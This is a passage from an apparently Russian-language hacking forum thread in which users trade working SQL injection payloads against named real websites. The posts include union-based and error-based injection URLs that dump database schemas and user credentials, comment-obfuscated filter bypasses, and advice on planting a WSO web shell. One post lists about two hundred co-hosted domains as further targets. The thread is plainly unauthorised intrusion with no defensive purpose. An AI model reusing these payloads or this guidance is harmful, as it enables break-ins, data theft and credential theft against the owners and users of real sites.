Есть скуля в поиске, но никак не получается составить истинное выражение для правильного вывода. Думал что так пройдёт, но всё равно тоже ругается Code: http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1 UPD Для обрезки запроса только ядовитые нули помогают, но запрос всё равно остаётся ложным Code: http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='1%00
Так хорошо задал вопрос, и так нелепо упустил скобку во внимании Code: http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8)--+1
Огромное спасибо, разобрался. Единственная проблема - данные из userlist не подходят для админки Code: http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(2),3,4,concat_ws(0x3a,user,pass),6,7,8+from+userlist+limit+0,1)--+1 А Админка тут Code: http://sport-razgrom.ru/admin Где ещё помимо мускула может лежать пасс от админки ?
Может быть банальная проверка PHP: <?php ... if($_POST['pass'] === 'password') { true; } else die('Error'); ?> [upd] да там бейсик авторизация, пароль хранится в файле.
Вообщем, если тебе ну очень интересно повысить свои права до веб-шелла на этом ресурсе, то я бы на твоем месте не расстраивался, а искал дальше. Тем более, что на сервере, по реверсу еще порядка 200 сайтов, на одном из них уж точно можно будет залиться, а действовать локально часто более результативно, чем извне. Вот списочек сайтов: Code: segway-city.ru www.abcde.by www.germida.com www.sjp.su gay-country.ru www.vashyprava.ru zaschita.name agnivo.ru www.samara777.ru tpgrad.ru www.zazerye.by www.zaitsevmedia.ru www.gualcolors.ru www.podaroknebes.ru af-school.ru bookfeel.ru www.stylish-stuff.ru asgardstudio.ru igroson.ru rubezh-kaluga.ru skottishfold.ru lostidea.ru mobilaport.ru www.farwel.ru pos-reklama.ru servers-saintp.ru honda-electric.ru vabene-mobili.ru www.server-life.ru games4pro.com www.akva-dv.ru www.avtovek73.ru mebelshik-msk.ru www.realborneo.ru www.photoka.info www.violetta.su www.ymuhin.ru it-otdel.org shko-la.ru www.26-it.ru cookerblog.ru charter-vip.com zdphoto.ru www.mobport.ru citymotors.ru www.kamerton-realty.ru adventure-team.pro 21antenna.ru cleanprint.ru www.air-industry.ru proactive-capital.com worldlegend.ru www.kanca.ru insideinform.ru salon-flamingo.ru agspec.ru 3d.globatek.ru ru925.ru smerchserver.ru www.catportal.ru www.zhostovo.com www.edinstwo.ru mardanov.info zadelkin.ru www.uralteploservis.ru tronlegacy.biz www.turist-vodnik.ru oletta.ru pfiff.ru stolnikov-motors.ru www.belwebdesign.com parketmoskva.ru doskarus.ru www.lingvoprofessional.ru www.rosstroy.me www.baki-n.ru ibfd-fund.com barnaulkapstroy.ru www.kuzaluplast.ru shtuchkipro.ru www.openeyes.ru ribak-ribaka.ru nnbuyback.com belayagora.info el-svoboda.ru vash-shans.com forum.servers-saintp.ru mertix.ru domenhost.com forex-grail.ru www.unplate.com www.it-26.ru eucvot.net imagophoto.ru pizza-stavropol.ru 1seconds.ru www.masterfreetzi.ru www.diezel-truck.ru topatulyashuz.ru www.mt-m.ru chidori-profit.com predict1on.ru www.exclusive-st.ru www.kenotrontv.ru www.stroyteploservis.ru www.fmr.su apple-star-films.com svetoart.ru filnauki.ru ekhb.ru kopeikina.com www.yafanatkino.ru dentolife.ru www.megapechi.ru mosarte.ru www.probro.ru 76yar.ru 100lotov.ru vivadizain.ru answers-mail1.ru www.alkonomsk.ru www.blogogolik.ru www.piercer.ru www.relaxtea.ru mebel-stavropol.ru www.flyfishka.ru medspravka24.com dentime.ru нейроклуб.рф margo.cc www.1alfa.ru pelmen.org www.russlines.ru forexbc.ru iportugal.ru mobila51.com special4kids.ru www.doctor-stapel.ru www.denapak.ru jantars.ru mosivphotos.com tur-topik.ru hstars.ru sport-razgrom.ru lazarevo43.ru www.bostoncar.ru www.sabahtea.ru www.trawka.ru donysoft.com avtoremontes.ru bestwax.ru artkadr.ru buhvolga.ru школа-40.рф selo-zavetnoe.ru armada-forward.com proficom.org www.turpoisk-kaluga.ru dress2.ru tg-marka.ru www.gce42.ru mary-care.ru www.discprint.ru xx76.ru kaluga-electro.ru www.livedoors.ru bigreferat.ru borodina-diet.ru torti.uz auditenergo.com www.housecomplect.ru www.yam-mebel.ru stroikapro.com www.baikalboat.com picimage.ru rimtermy.ru doma1ns.ru gachirkov.com gercules.com burointerior.com www.tesk72.ru universepw.ru moiorigami.ru imdi.ru yurikoff.com www.kolgotki-belie.ru artidelo.ru www.stopholod.ru www.otel89.ru agrohimsnab.ru rabobo.ru planmytrip.ru www.la2galaxy.ru inflat.ru sexperts.ru arshu.ru salongavrosh.ru best4girls.ru forex-rts.ru cards2.ru www.avto-instrument.net legalka-tver.ru moivyshivki.ru fotolok.ru Сервак конечно не порутается, т.к.: Code: Linux server18.hosting.reg.ru 2.6.26-2-amd64 #1 SMP Tue Jan 25 05:59:43 UTC 2011 x86_64 Но можно надеяться на криво-выставленные права, бэкапы, забытый .bash_history, бажный демон или еще какую вкусняшку.
Да я искал уже. Проблема в том, что хостинг сразу предлагает предустановленные движки аля джумла или вордпресс, ессно пропатченные. Редко кто юзает самопис. А те кто юзает, админки не держат ибо почти везде html. Редко где самопис на пхп, да и админки не везде. Вот один из сайтов в списке. Code: http://100lotov.ru/objects.php?type=3+and+1=2+union+select+1,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+--+
Ну по всей видимости вывод попадает в заголовок Location, и очевидней будет сделать так Code: -3'/**//*!union*//**//*!select*//**/version()--'
Такой вопрос, прочитал через скуль конфиг цмс dbhost = localhost dbuser = lalala dbname = lalal2 dbpass = password pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится пишу в конфиге phpmyadmin'a host site.ru pass lalala, db и т.п. пишет (2003) нет конекта к серверу Вопрос почему? если в конфиге написано сервер дб = localhost Ну или как можно узнать какой ип у ДБ = \ Порт вроде стандартный, в php.ini смотрел = \
вроде и так все понятно что коннект с БД только с локалки + удаленный коннект запрещен... порт то 3306 просканил хоть перед коннектом ?
Потому что localhost. Тебе нужно цепляться к мускулу как по локалке. Выход - шелл. Хочешь сдампить бд или просто подрубиться - залей шелл типа wso и сдампи бд через настройки ЦМС. Быстрее и удобнее будет.
Вероятность то что mysql открыт для доступа из вне (а если и открыт, то чаще всего для определенного хоста) слишком мала. Как вариант можно проверить пароли к фтп или ссш. И если ты смог прочитать файлы через MySQL инъекцию, значит у тебя file_priv = on, а если в добавок к тому, ты вызвал load_file('/путь/файл') без кодировки (типа hex) то у тебя и magic_quotes_gpc = off, это значит что если ты найдешь полный путь до веб каталога для которого хватит прав на запись, то шелл считай у тебя есть.
Code: http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_categories)group/**/by(concat(version(),0x00,floor(rand(0)*2))))and(if(mid(version(),1,1)=5,1,0))='1.html
Сначала прочитай то, что я тебе дал, а потом если возникнут вопросы, задавай их здесь, но только по существу, а не какой то набор буквосимволов что я процитировал.
http://rf-cheats.nichost.ru/index.php?styleid=2+3%27 посмотрите пожалуйста вроде как скуль но что-то там не так, после перезагрузки страници пропадает ошибка, и вывести поля не возможно, пробывал blind sql но тоже ничего не выводит так как ошибка куда то деваетса, я заметил что ошибка пропадает после третьего запроса в URLe, что это помогите разобратса
